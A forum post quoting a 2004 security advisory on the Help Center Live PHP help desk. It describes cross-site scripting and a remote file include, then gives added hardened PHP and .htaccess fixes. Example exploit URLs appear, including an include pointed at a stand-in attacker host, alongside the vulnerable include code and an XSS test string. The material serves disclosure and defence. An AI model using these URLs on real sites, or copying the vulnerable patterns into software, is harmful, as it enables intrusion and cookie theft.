Hi, I have just been trying out Help Centre Live from Fantastico, and I came across this on the web. Has this been fixed, or should we just dump it?
I know it's an old report, but I am still wary of continuing with this product!
Thanks...
Critical Vulnerability In Help Center Live
December 24, 2004
Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities
Description:
Help Center Live is a "Live" help desk system written in PHP using a MySQL database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.
Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.
http://path/faq/index.php?find=[CODEGOESHERE]&search=Search
This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.
File Include Vulnerability:
There lies a very dangerous file include vulnerability in Help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file:
http://path/inc/pipe.php?HCL_path=http://attacker
All an attacker has to do is include any malicious PHP code and it will be executed. Here is the vulnerable code; it is located in inc/pipe.php:
$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);
Since we call the pipe.php file directly, we can now include a file as long as register_globals is turned on in the PHP configuration settings. There is a similar issue in skin.php; this could be used in some circumstances to gain access to arbitrary local files and possibly more.
// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
$SKIN_inner = "default";
}
// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);
Solution:
I have contacted the developer, but received no answer. My advice would be for any users running Help Center Live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in the Apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.
Credits:
James Bercegay of the GulfTech Security Research Team
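The quoted advisory shows two patterns in inc/pipe.php and skin.php (the include base path and the skin file names taken from variables an attacker can set via register_globals). The PHP below is an added example of how those two spots would be hardened; it is not Help Center Live's own code and not a patch from the vendor. It assumes the application root is the parent directory of /inc/, that skins live under <root>/inc/skins/<name>/, and that the helper names (hcl_skin_file, hcl_escape) are invented here for illustration.

```php
<?php
// Added example, not Help Center Live's own code. Hardens the two patterns
// quoted in the advisory. Assumptions: this file lives in <root>/inc/, and
// skins live under <root>/inc/skins/<name>/ (hypothetical layout).

// 1. Remote file include fix: never derive the include base path from a
//    variable that register_globals (or a request) can populate. A constant
//    computed from the file's own location cannot be overridden by ?HCL_path=.
define('HCL_PATH', dirname(__DIR__));

// 2. Defence in depth: refuse to serve this include file as a top-level script.
//    The advisory's .htaccess advice does the same thing at the web-server layer.
if (realpath($_SERVER['SCRIPT_FILENAME'] ?? '') === realpath(__FILE__)) {
    http_response_code(403);
    exit('Forbidden');
}

require HCL_PATH . '/inc/DecodeMessage.inc';

/**
 * Local file read fix: resolve a skin file strictly inside the skins directory.
 * Returns the absolute path, or null if any component is not a plain identifier
 * or the resolved path escapes <root>/inc/skins/. Rejects "../", "http://",
 * NUL bytes and anything else that is not [A-Za-z0-9_-].
 */
function hcl_skin_file(string $name, string $type, string $inner = 'default'): ?string
{
    foreach ([$name, $type, $inner] as $part) {
        if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $part)) {
            return null;
        }
    }
    $base = realpath(HCL_PATH . '/inc/skins');
    $file = realpath(HCL_PATH . "/inc/skins/$name/{$type}_inner_$inner.hcl");
    // realpath() returns false for a missing file; also insist the resolved
    // path starts with the skins directory plus a separator (no prefix tricks).
    if ($base === false || $file === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

/**
 * Cross-site scripting fix for the faq/index.php?find= case: encode user input
 * before it is reflected into HTML, so it is rendered as text, not markup.
 */
function hcl_escape(string $userInput): string
{
    return htmlspecialchars($userInput, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Usage (inputs shown here are constructed; in the application they would come
// from validated request handling in a front controller, never from globals).
$skinFile = hcl_skin_file('default', 'main', 'default');
if ($skinFile === null) {
    http_response_code(400);
    exit('Bad skin');
}
$SKIN_output_inner = file_get_contents($skinFile);

$find = '<script>alert(1)</script>';   // constructed sample of hostile input
echo 'Results for: ' . hcl_escape($find); // renders as literal text, not a script
```

The web-server side of the advisory's advice is independent of this code: an .htaccess file in /inc/ containing `Deny from all` (Apache 2.2) or `Require all denied` (Apache 2.4) stops pipe.php and skin.php from being requested directly, while the application can still `include` them from files outside /inc/. Both layers together are what you want, since the .htaccess alone does not fix the register_globals dependency if the same pattern exists in a file that must stay reachable.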